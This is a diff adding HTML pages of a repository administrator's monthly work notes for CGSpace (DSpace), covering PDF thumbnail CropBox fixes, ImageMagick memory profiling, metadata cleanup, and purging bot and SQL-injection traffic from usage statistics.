+</span></span><span style="display:flex;"><span>MediaBox:            0.00     0.00  1190.55   841.89
+</span></span><span style="display:flex;"><span>CropBox:           594.38     0.00  1190.55   839.18
+</span></span><span style="display:flex;"><span>BleedBox:          594.38     0.00  1190.55   839.18
+</span></span><span style="display:flex;"><span>TrimBox:           594.38     0.00  1190.55   839.18
+</span></span><span style="display:flex;"><span>ArtBox:            594.38     0.00  1190.55   839.18
+</span></span><span style="display:flex;"><span>File size:       572600 bytes
+</span></span><span style="display:flex;"><span>Optimized:       no
+</span></span><span style="display:flex;"><span>PDF version:     1.6
+</span></span></code></pre></div><ul>
+<li>In this case the MediaBox is a strange size, and we should use the CropBox
+<ul>
+<li>I wonder if we can check that from DSpace&hellip;</li>
+</ul>
+</li>
+<li>Apply some corrections from Peter on CGSpace</li>
+<li>Meeting with Leroy, Daniel, Francesca, and Maria from Alliance to review their TIP tool and talk about next steps
+<ul>
+<li>We asked them to do some real submissions (as opposed to &ldquo;I like coffee&rdquo; etc) to test the full breadth of the metadata and controlled vocabularies</li>
+</ul>
+</li>
+<li>Minor work on the CG Core Types spreadsheet to clear up some of the actions and incorporate some of Peter&rsquo;s feedback</li>
+<li>After looking at the request patterns in nginx on CGSpace for the past few weeks I see nothing that would explain the high loads we see several times per week (especially Sundays!)
+<ul>
+<li>So I suspect there is a noisy neighbor, and actually I do see some non-trivial amount of CPU steal in my Munin graphs and <code>iostat</code></li>
+<li>I asked Linode to move the instance elsewhere</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-10-22">2022-10-22</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-10-24">2022-10-24</h2>
+<ul>
+<li>Peter sent me some corrections for affiliations:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2022-10-24-affiliations.csv 
+</span></span><span style="display:flex;"><span>cg.contributor.affiliation,correct
+</span></span><span style="display:flex;"><span>Wageningen University and Research Centre,Wageningen University &amp; Research
+</span></span><span style="display:flex;"><span>Wageningen University and Research,Wageningen University &amp; Research
+</span></span><span style="display:flex;"><span>Wageningen University,Wageningen University &amp; Research
+</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i 2022-10-24-affiliations.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.contributor.affiliation -m <span style="color:#ae81ff">211</span> -t correct -d
+</span></span></code></pre></div><ul>
+<li>Add ORCID identifier for Claudia Arndt on CGSpace and tag her existing items</li>
+<li>Linode responded to my request last week and said they don&rsquo;t think that the culprit here is CPU steal, but that they would move us to another host anyways
+<ul>
+<li>I still need to check the Munin graphs</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-10-25">2022-10-25</h2>
+<ul>
+<li>Upload some changes to items on CGSpace for Peter</li>
+<li>Start a full Discovery index on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real    226m40.463s
+</span></span><span style="display:flex;"><span>user    132m6.511s
+</span></span><span style="display:flex;"><span>sys     3m15.077s
+</span></span></code></pre></div><h2 id="2022-10-26">2022-10-26</h2>
+<ul>
+<li>We published the <a href="https://hdl.handle.net/10568/125167">infographic</a> and <a href="https://www.ilri.org/news/celebrating-open-access-cgspace">blog post</a> to mark CGSpace&rsquo;s 100,000th item
+<ul>
+<li>I generated a high-quality thumbnail using ImageMagick in order to Tweet it:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ convert -density <span style="color:#ae81ff">144</span> 10568-125167.pdf<span style="color:#ae81ff">\[</span>0<span style="color:#ae81ff">\]</span> -thumbnail x1200 /tmp/10568-125167.pdf.png
+</span></span><span style="display:flex;"><span>$ pngquant /tmp/10568-125167.pdf.png
+</span></span></code></pre></div><ul>
+<li>Spent some time looking at the MediaBox / CropBox thing in DSpace&rsquo;s <code>ImageMagickThumbnailFilter.java</code>
+<ul>
+<li>We need to make sure to put <code>-define pdf:use-cropbox=true</code> before we specify the input file or else it will not have any effect</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-10-27">2022-10-27</h2>
+<ul>
+<li>I found out that we can use <a href="https://pdfcpu.io/boxes/boxes_remove.html#examples">pdfcpu to remove the CropBox from a PDF</a> for testing:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ pdfcpu box rem -- <span style="color:#e6db74">&#34;crop&#34;</span> in.pdf out.pdf
+</span></span></code></pre></div><ul>
+<li>I filed <a href="https://github.com/DSpace/DSpace/issues/8549">an issue on DSpace</a> for the ImageMagick <code>CropBox</code> problem
+<ul>
+<li>I decided that this is a bug that should be fixed separately from the &ldquo;improving thumbnail quality&rdquo; issue</li>
+<li>I made <a href="https://github.com/DSpace/DSpace/pull/8550">a pull request</a> to fix the <code>CropBox</code> issue</li>
+</ul>
+</li>
+<li>I did more work on my <a href="https://github.com/alanorth/improved-dspace-thumbnails/">improved-dspace-thumbnails</a> microsite to complement the DSpace thumbnail pull requests
+<ul>
+<li>I am updating it to recommend using the PDF cropbox and &ldquo;supersampling&rdquo; with a higher density than 72</li>
+<li>I measured execution time of ImageMagick with <code>time</code> and found that the higher-density mode takes about five times longer on average</li>
+<li>I measured the <a href="https://stackoverflow.com/a/131346">maximum heap memory of ImageMagick with Valgrind and Massif</a>:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ valgrind --tool<span style="color:#f92672">=</span>massif magick convert ...
+</span></span></code></pre></div><ul>
+<li>Then I checked the results for each set of default DSpace thumbnail runs and &ldquo;improved&rdquo; thumbnail runs using <code>ms_print</code> (hacky way to get the max heap, I know):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> file in memory-dspace/massif.out.49*; <span style="color:#66d9ef">do</span> ms_print <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span> | grep -A1 <span style="color:#e6db74">&#34;    MB&#34;</span> | tail -n1 | sed <span style="color:#e6db74">&#39;s/\^.*//&#39;</span>; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>15.87
+</span></span><span style="display:flex;"><span>16.06
+</span></span><span style="display:flex;"><span>21.26
+</span></span><span style="display:flex;"><span>15.88
+</span></span><span style="display:flex;"><span>20.01
+</span></span><span style="display:flex;"><span>15.85
+</span></span><span style="display:flex;"><span>20.06
+</span></span><span style="display:flex;"><span>16.04
+</span></span><span style="display:flex;"><span>15.87
+</span></span><span style="display:flex;"><span>15.87
+</span></span><span style="display:flex;"><span>20.02
+</span></span><span style="display:flex;"><span>15.87
+</span></span><span style="display:flex;"><span>15.86
+</span></span><span style="display:flex;"><span>19.92
+</span></span><span style="display:flex;"><span>10.89
+</span></span><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> file in memory-improved/massif.out.5*; <span style="color:#66d9ef">do</span> ms_print <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span> | grep -A1 <span style="color:#e6db74">&#34;    MB&#34;</span> | tail -n1 | sed <span style="color:#e6db74">&#39;s/\^.*//&#39;</span>; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>245.3
+</span></span><span style="display:flex;"><span>245.5
+</span></span><span style="display:flex;"><span>298.6
+</span></span><span style="display:flex;"><span>245.3
+</span></span><span style="display:flex;"><span>306.8
+</span></span><span style="display:flex;"><span>245.2
+</span></span><span style="display:flex;"><span>306.9
+</span></span><span style="display:flex;"><span>245.5
+</span></span><span style="display:flex;"><span>245.2
+</span></span><span style="display:flex;"><span>245.3
+</span></span><span style="display:flex;"><span>306.8
+</span></span><span style="display:flex;"><span>245.3
+</span></span><span style="display:flex;"><span>244.9
+</span></span><span style="display:flex;"><span>306.3
+</span></span><span style="display:flex;"><span>165.6
+</span></span></code></pre></div><ul>
+<li>Ouch, this shows that it takes about <em>fifteen times</em> more memory to do the &ldquo;4x&rdquo; density of 288!
+<ul>
+<li>It seems more reasonable to use a &ldquo;2x&rdquo; density of 144:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> file in memory-improved-144/*; <span style="color:#66d9ef">do</span> ms_print <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span> | grep -A1 <span style="color:#e6db74">&#34;    MB&#34;</span> | tail -n1 | sed <span style="color:#e6db74">&#39;s/\^.*//&#39;</span>; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>61.80
+</span></span><span style="display:flex;"><span>62.00
+</span></span><span style="display:flex;"><span>76.76
+</span></span><span style="display:flex;"><span>61.82
+</span></span><span style="display:flex;"><span>77.43
+</span></span><span style="display:flex;"><span>61.77
+</span></span><span style="display:flex;"><span>77.48
+</span></span><span style="display:flex;"><span>61.98
+</span></span><span style="display:flex;"><span>61.76
+</span></span><span style="display:flex;"><span>61.81
+</span></span><span style="display:flex;"><span>77.44
+</span></span><span style="display:flex;"><span>61.81
+</span></span><span style="display:flex;"><span>61.69
+</span></span><span style="display:flex;"><span>77.16
+</span></span><span style="display:flex;"><span>41.84
+</span></span></code></pre></div><ul>
+<li>There&rsquo;s a really cool visualizer called massif-visualizer, but it isn&rsquo;t easy to parse</li>
+</ul>
+<h2 id="2022-10-28">2022-10-28</h2>
+<ul>
+<li>I finalized the code for the ImageMagick density change and made a <a href="https://github.com/DSpace/DSpace/pull/8553">pull request</a> against DSpace 7.x</li>
+</ul>
+<h2 id="2022-10-29">2022-10-29</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-10-31">2022-10-31</h2>
+<ul>
+<li>Tag version 6.1 of cgspace-java-helpers: <a href="https://github.com/ilri/cgspace-java-helpers/releases/tag/v6.1">https://github.com/ilri/cgspace-java-helpers/releases/tag/v6.1</a>
+<ul>
+<li>I also pushed a more recent <code>6.1-SNAPSHOT</code> version to Maven Central via OSSRH</li>
+<li>I should probably push a non SNAPSHOT but I don&rsquo;t have time to figure that out in Maven</li>
+</ul>
+</li>
+<li>Add some new items on CGSpace and update others for Peter</li>
+<li>Email Mishell from CIP about their <a href="https://cgspace.cgiar.org/handle/10568/125218">old theses</a> which are using Creative Commons licenses
+<ul>
+<li>They said it&rsquo;s OK so I updated all sixteen items in that collection</li>
+</ul>
+</li>
+<li>Move the &ldquo;MEL submissions&rdquo; collection on CGSpace from ICARDA&rsquo;s community to the Initiatives community</li>
+<li>Meeting with Peter and Abenet about ongoing CGSpace action points</li>
+<li>I created the authorizations for Alliance&rsquo;s TIP tool to submit on CGSpace</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2022-11/index.html b/docs/2022-11/index.html
new file mode 100644
index 000000000..13f94879c
--- /dev/null
+++ b/docs/2022-11/index.html
@@ -0,0 +1,811 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="November, 2022" />
+<meta property="og:description" content="2022-11-01
+
+Last night I re-synced DSpace 7 Test from CGSpace
+
+I also updated all my local 7_x-dev branches on the latest upstreams
+
+
+I spent some time updating the authorizations in Alliance collections
+
+I want to make sure they use groups instead of individuals where possible!
+
+
+I reverted the Cocoon autosave change because it was more of a nuissance that Peter can&rsquo;t upload CSVs from the web interface and is a very low severity security issue
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-11/" />
+<meta property="article:published_time" content="2022-11-01T09:11:36+03:00" />
+<meta property="article:modified_time" content="2023-01-04T10:53:02+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="November, 2022"/>
+<meta name="twitter:description" content="2022-11-01
+
+Last night I re-synced DSpace 7 Test from CGSpace
+
+I also updated all my local 7_x-dev branches on the latest upstreams
+
+
+I spent some time updating the authorizations in Alliance collections
+
+I want to make sure they use groups instead of individuals where possible!
+
+
+I reverted the Cocoon autosave change because it was more of a nuissance that Peter can&rsquo;t upload CSVs from the web interface and is a very low severity security issue
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "November, 2022",
+  "url": "https://alanorth.github.io/cgspace-notes/2022-11/",
+  "wordCount": "3411",
+  "datePublished": "2022-11-01T09:11:36+03:00",
+  "dateModified": "2023-01-04T10:53:02+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-11/">
+
+    <title>November, 2022 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-11/">November, 2022</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2022-11-01T09:11:36+03:00">Tue Nov 01, 2022</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-11-01">2022-11-01</h2>
+<ul>
+<li>Last night I re-synced DSpace 7 Test from CGSpace
+<ul>
+<li>I also updated all my local <code>7_x-dev</code> branches on the latest upstreams</li>
+</ul>
+</li>
+<li>I spent some time updating the authorizations in Alliance collections
+<ul>
+<li>I want to make sure they use groups instead of individuals where possible!</li>
+</ul>
+</li>
+<li>I reverted the Cocoon autosave change because it was more of a nuissance that Peter can&rsquo;t upload CSVs from the web interface and is a very low severity security issue</li>
+</ul>
+<ul>
+<li>I ran FixLowQualityThumbnails from cgspace-java-helpers on some large collections on CGSpace and ended up fixing 194 items!</li>
+<li>I did some minor checking and uploaded twenty-four IFPRI outputs for the Initiatives to DSpace Test</li>
+<li>Tim merged my <a href="https://github.com/DSpace/DSpace/pull/8553">pull request to override the ImageMagick PDF density in DSpace 7</a>
+<ul>
+<li>I ported it to DSpace 6.x and submitted a pull request: <a href="https://github.com/DSpace/DSpace/pull/8560">https://github.com/DSpace/DSpace/pull/8560</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-11-02">2022-11-02</h2>
+<ul>
+<li>I joined the FAO–CGIAR AGROVOC results sharing meeting
+<ul>
+<li>From June to October, 2022 we suggested 39 new keywords, added 27 to AGROVOC, 4 rejected, and 9 still under discussion</li>
+</ul>
+</li>
+<li>Doing duplicate check on IFPRI&rsquo;s batch upload and I found one duplicate uploaded by IWMI earlier this year
+<ul>
+<li>I will update the metadata of that item and map it to the correct Initiative collection</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-11-03">2022-11-03</h2>
+<ul>
+<li>I added countries to the twenty-three IFPRI items in OpenRefine based on their titles and abstracts (using the Jython trick I learned a few months ago), then added regions using csv-metadata-quality, and uploaded them to CGSpace</li>
+<li>I exported a list of collections from CGSpace so I can run the thumbnail fixes on each, as we seem to have issues when doing it on (some) large communities like the CRP community:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= ☘ \COPY (SELECT ds6_collection2collectionhandle(uuid) AS collection FROM collection) to /tmp/collections.txt
+</span></span><span style="display:flex;"><span>COPY 1268
+</span></span></code></pre></div><ul>
+<li>Then I started a test run on DSpace Test:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">while</span> read -r collection; <span style="color:#66d9ef">do</span> chrt -b <span style="color:#ae81ff">0</span> dspace dsrun io.github.ilri.cgspace.scripts.FixLowQualityThumbnails $collection | tee -a /tmp/FixLowQualityThumbnails.log; <span style="color:#66d9ef">done</span> &lt; /tmp/collections.txt
+</span></span></code></pre></div><ul>
+<li>I&rsquo;ll be curious to check the log after it&rsquo;s all done.
+<ul>
+<li>After a few hours I see:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;Action: remove&#39;</span> /tmp/FixLowQualityThumbnails.log 
+</span></span><span style="display:flex;"><span>626
+</span></span></code></pre></div><ul>
+<li>Not bad, because last week I did a more manual selection of collections and deleted ~200
+<ul>
+<li>I will replicate this on CGSpace soon, and also try the FixJpgJpgThumbnails tool</li>
+</ul>
+</li>
+<li>I see that the CIAT Library is still up, so I should really grab all the PDFs before they shut that old server down
+<ul>
+<li>Export a list of items with PDFs linked there:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT dspace_object_id,text_value FROM metadatavalue WHERE metadata_field_id=219 AND text_value LIKE &#39;%ciat-library%&#39;) to /tmp/ciat-library-items.csv;
+</span></span><span style="display:flex;"><span>COPY 4621
+</span></span></code></pre></div><ul>
+<li>After stripping the page numbers off I see there are only about 2,700 unique files, and we have to filter the dead JSPUI ones&hellip;</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c url 2022-11-03-CIAT-Library-items.csv | sed 1d | grep -v jspui | sort -u | wc -l
+</span></span><span style="display:flex;"><span>2752
+</span></span></code></pre></div><ul>
+<li>I&rsquo;m not sure how we&rsquo;ll handle the duplicates because many items are book chapters or something where they share a PDF</li>
+</ul>
+<h2 id="2022-11-04">2022-11-04</h2>
+<ul>
+<li>I decided to check for old pre-ImageMagick thumbnails on CGSpace by finding any bitstreams with the description &ldquo;Generated Thumbnail&rdquo;:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT ds6_bitstream2itemhandle(dspace_object_id) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND text_value=&#39;Generated Thumbnail&#39;) to /tmp/old-thumbnails.txt;
+</span></span><span style="display:flex;"><span>COPY 1147
+</span></span><span style="display:flex;"><span>$ grep -v <span style="color:#e6db74">&#39;\\N&#39;</span> /tmp/old-thumbnails.txt &gt; /tmp/old-thumbnail-handles.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/old-thumbnail-handles.txt 
+</span></span><span style="display:flex;"><span>987 /tmp/old-thumbnail-handles.txt
+</span></span></code></pre></div><ul>
+<li>A bunch of these have <code>\N</code> for some reason when I use the <code>ds6_bitstream2itemhandle</code> function to get their handles so I had to exclude those&hellip;
+<ul>
+<li>I forced the media-filter for these items on CGSpace:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">while</span> read -r handle; <span style="color:#66d9ef">do</span> JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx512m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -i $handle -f -v; <span style="color:#66d9ef">done</span> &lt; /tmp/old-thumbnail-handles.txt
+</span></span></code></pre></div><ul>
+<li>Upload some batch records via CSV for Peter</li>
+<li>Update the about page on CGSpace with new text from Peter</li>
+<li>Add a few more ORCID identifiers and names to my growing file <code>2022-09-22-add-orcids.csv</code>
+<ul>
+<li>I tagged fifty-four new authors using this list</li>
+</ul>
+</li>
+<li>I deleted and mapped one duplicate item for Maria Garruccio</li>
+<li>I updated the CG Core website from Bootstrap v4.6 to v5.2</li>
+</ul>
+<h2 id="2022-11-07">2022-11-07</h2>
+<ul>
+<li>I did a harvest on AReS last night but it seems that MELSpace&rsquo;s sitemap is broken again because we have 10,000 fewer records</li>
+<li>I filed <a href="https://github.com/ecrmnn/iso-3166-1/issues/10">an issue</a> on the iso-3166-1 npm package to update the name of Turkey to Türkiye
+<ul>
+<li>I also filed <a href="https://github.com/flyingcircusio/pycountry/issues/148">an issue</a> and <a href="https://github.com/flyingcircusio/pycountry/pull/149">a pull request</a> on the pycountry package</li>
+<li>I also filed <a href="https://github.com/konstantinstadler/country_converter/issues/121">an issue</a> and <a href="https://github.com/konstantinstadler/country_converter/pull/122">a pull request</a> on the country-converter package</li>
+<li>I also changed one item on CGSpace that had been submitted since the name was changed</li>
+<li>I also imported the new iso-codes 4.12.0 into cgspace-java-helpers</li>
+<li>I also updated it in the DSpace <code>input-forms.xml</code></li>
+<li>I also forked the iso-3166-1 package from npm and updated Swaziland, Macedonia, and Turkey in my fork
+<ul>
+<li>I submitted a <a href="https://github.com/ecrmnn/iso-3166-1/pull/11">pull request</a> to update this upstream</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Since I was making all these pull requests I also made <a href="https://github.com/konstantinstadler/country_converter/pull/123">one on country-converter for the UN M.49 region &ldquo;South-eastern Asia&rdquo;</a></li>
+<li>Port the <a href="https://github.com/DSpace/DSpace/pull/8550">ImageMagick PDF cropbox fix</a> to DSpace 6.x
+<ul>
+<li>I deployed it on CGSpace, ran all updates, and rebooted the host</li>
+<li>I ran the filter-media script on one large collection where many of these PDFs with cropbox issues exist:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -v -f -i 10568/78 &gt;&amp; /tmp/filter-media-cropbox.log
+</span></span></code></pre></div><ul>
+<li>But looking at the items it processed, I&rsquo;m not sure it&rsquo;s working as expected
+<ul>
+<li>I looked at a few dozen</li>
+</ul>
+</li>
+<li>I found some links to the Bioversity website on CGSpace that are not redirecting properly:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ http --print Hh http://www.bioversityinternational.org/nc/publications/publication/issue/geneflow_2004.html 
+</span></span><span style="display:flex;"><span>GET /nc/publications/publication/issue/geneflow_2004.html HTTP/1.1
+</span></span><span style="display:flex;"><span>Accept: */*
+</span></span><span style="display:flex;"><span>Accept-Encoding: gzip, deflate
+</span></span><span style="display:flex;"><span>Connection: keep-alive
+</span></span><span style="display:flex;"><span>Host: www.bioversityinternational.org
+</span></span><span style="display:flex;"><span>User-Agent: HTTPie/3.2.1
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>HTTP/1.1 302 Found
+</span></span><span style="display:flex;"><span>Connection: Keep-Alive
+</span></span><span style="display:flex;"><span>Content-Length: 275
+</span></span><span style="display:flex;"><span>Content-Type: text/html; charset=iso-8859-1
+</span></span><span style="display:flex;"><span>Date: Mon, 07 Nov 2022 16:35:21 GMT
+</span></span><span style="display:flex;"><span>Keep-Alive: timeout=15, max=100
+</span></span><span style="display:flex;"><span>Location: https://www.bioversityinternational.orgnc/publications/publication/issue/geneflow_2004.html
+</span></span><span style="display:flex;"><span>Server: Apache
+</span></span></code></pre></div><ul>
+<li>The <code>Location</code> header is clearly wrong, and if I try https directly I get an HTTP 500</li>
+</ul>
+<h2 id="2022-11-08">2022-11-08</h2>
+<ul>
+<li>Looking at the Solr statistics hits on CGSpace for 2022-11
+<ul>
+<li>I see 221.219.100.42 is on China Unicom and was making thousands of requests to XMLUI in a few hours, using a normal user agent</li>
+<li>I see 122.10.101.60 is in Hong Kong and making thousands of requests to XMLUI handles in a few hours, using a normal user agent</li>
+<li>I see 135.125.21.38 on OVH is making thousands of requests trying to do SQL injection</li>
+<li>I see 163.237.216.11 is somewhere in California making thousands of requests with a normal user agent</li>
+<li>I see 51.254.154.148 on OVH is making thousands of requests trying to do SQL injection</li>
+<li>I see 221.219.103.211 is on China Unicom and was making thousands of requests to XMLUI in a few hours, using a normal user agent</li>
+<li>I see 216.218.223.53 on Hurricane Electric making thousands of requests to XMLUI in a few minutes using a normal user agent</li>
+<li>I will purge all these hits and proably add China Unicom&rsquo;s subnet mask to my nginx <code>bot-network.conf</code> file to tag them as bots since there are SO many bad and malicious requests coming from there</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+</span></span><span style="display:flex;"><span>Purging 8975 hits from 221.219.100.42 in statistics
